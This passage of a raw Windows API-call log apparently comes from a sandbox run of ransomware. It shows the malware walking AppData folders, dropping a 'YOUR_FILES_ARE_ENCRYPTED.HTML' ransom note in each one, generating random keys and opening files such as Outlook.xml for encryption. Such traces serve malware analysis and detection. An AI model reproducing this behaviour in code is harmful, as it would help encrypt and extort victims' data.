(lpString1="rasphone.pbk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.337] PathFindExtensionW (pszPath="rasphone.pbk") returned=".pbk" [0165.337] lstrlenW (lpString=".pbk") returned 4 [0165.337] PathFindExtensionW (pszPath="rasphone.pbk") returned=".pbk" [0165.337] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="rasphone.pbk", cAlternateFileName="")) returned 0 [0165.337] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0165.337] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0165.337] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0165.338] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0165.340] CloseHandle (hObject=0x58c) returned 1 [0165.341] GetProcessHeap () returned 0x270000 [0165.342] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.342] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 0 [0165.342] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.342] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 103 [0165.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.343] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.345] CloseHandle (hObject=0x5b8) returned 1 [0165.345] GetProcessHeap () returned 0x270000 [0165.346] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.346] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Pbk", cAlternateFileName="")) returned 0 [0165.346] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.346] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0165.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.347] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.349] CloseHandle (hObject=0x304) returned 1 [0165.349] GetProcessHeap () returned 0x270000 [0165.350] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.354] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xda10c5f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xda10c5f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xda10c5f0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0165.354] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.354] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0165.354] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Network\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\network\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.355] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.357] CloseHandle (hObject=0x5e4) returned 1 [0165.357] GetProcessHeap () returned 0x270000 [0165.358] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.359] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1f9be0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1c7f460, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0165.359] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office") returned 56 [0165.359] GetProcessHeap () returned 0x270000 [0165.359] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.359] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office" [0165.359] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\*" [0165.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1f9be0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1c7f460, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.362] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb1f9be0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1c7f460, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1c7f460, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.362] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb1f9be0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xeb1f9be0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xeb1f9be0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0165.362] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl") returned 68 [0165.362] lstrcmpW (lpString1="MSO1033.acl", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.362] PathFindExtensionW (pszPath="MSO1033.acl") returned=".acl" [0165.362] lstrlenW (lpString=".acl") returned 4 [0165.362] PathFindExtensionW (pszPath="MSO1033.acl") returned=".acl" [0165.362] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1c59300, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Recent", cAlternateFileName="")) returned 1 [0165.362] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 63 [0165.362] GetProcessHeap () returned 0x270000 [0165.362] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.364] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0165.364] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0165.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1c59300, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.365] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1c59300, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.365] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf1d63ca0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x1c, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 1 [0165.365] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 73 [0165.365] lstrcmpW (lpString1="index.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.365] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0165.365] lstrlenW (lpString=".dat") returned 4 [0165.365] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0165.365] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0165.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0165.365] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=28) returned 1 [0165.365] CloseHandle (hObject=0x5b8) returned 1 [0165.366] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1d3db40, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d3db40, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x0, dwReserved1=0x60, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0165.366] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK") returned 77 [0165.366] lstrcmpW (lpString1="Templates.LNK", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.366] PathFindExtensionW (pszPath="Templates.LNK") returned=".LNK" [0165.366] lstrlenW (lpString=".LNK") returned 4 [0165.366] PathFindExtensionW (pszPath="Templates.LNK") returned=".LNK" [0165.366] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf1d3db40, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d3db40, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x0, dwReserved1=0x60, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0165.366] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.366] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0165.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\Recent\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\office\\recent\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.366] WriteFile (in: hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.369] CloseHandle (hObject=0x304) returned 1 [0165.369] GetProcessHeap () returned 0x270000 [0165.370] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.370] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf1c59300, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf1d63ca0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf1d63ca0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Recent", cAlternateFileName="")) returned 0 [0165.370] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.370] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0165.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Office\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\office\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.371] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.393] CloseHandle (hObject=0x5e4) returned 1 [0165.393] GetProcessHeap () returned 0x270000 [0165.394] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.394] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ae8f460, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x36540ce0, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0165.394] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook") returned 57 [0165.394] GetProcessHeap () returned 0x270000 [0165.394] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.394] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook" [0165.394] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0165.394] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ae8f460, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x36540ce0, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.395] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ae8f460, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x36540ce0, ftLastWriteTime.dwHighDateTime=0x1d709ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.395] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e35fc80, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x2e35fc80, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x823fa4e0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0165.395] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs") returned 69 [0165.395] lstrcmpW (lpString1="Outlook.srs", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.395] PathFindExtensionW (pszPath="Outlook.srs") returned=".srs" [0165.395] lstrlenW (lpString=".srs") returned 4 [0165.395] PathFindExtensionW (pszPath="Outlook.srs") returned=".srs" [0165.395] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36540ce0, ftCreationTime.dwHighDateTime=0x1d709ba, ftLastAccessTime.dwLowDateTime=0x36540ce0, ftLastAccessTime.dwHighDateTime=0x1d709ba, ftLastWriteTime.dwLowDateTime=0x828262d0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x94e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0165.395] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml") returned 69 [0165.395] lstrcmpW (lpString1="Outlook.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.395] PathFindExtensionW (pszPath="Outlook.xml") returned=".xml" [0165.395] lstrlenW (lpString=".xml") returned 4 [0165.395] PathFindExtensionW (pszPath="Outlook.xml") returned=".xml" [0165.395] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0165.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0165.396] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebd504 | out: lpFileSize=0x4ebd504*=2382) returned 1 [0165.396] GetProcessHeap () returned 0x270000 [0165.396] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.398] wsprintfW (in: 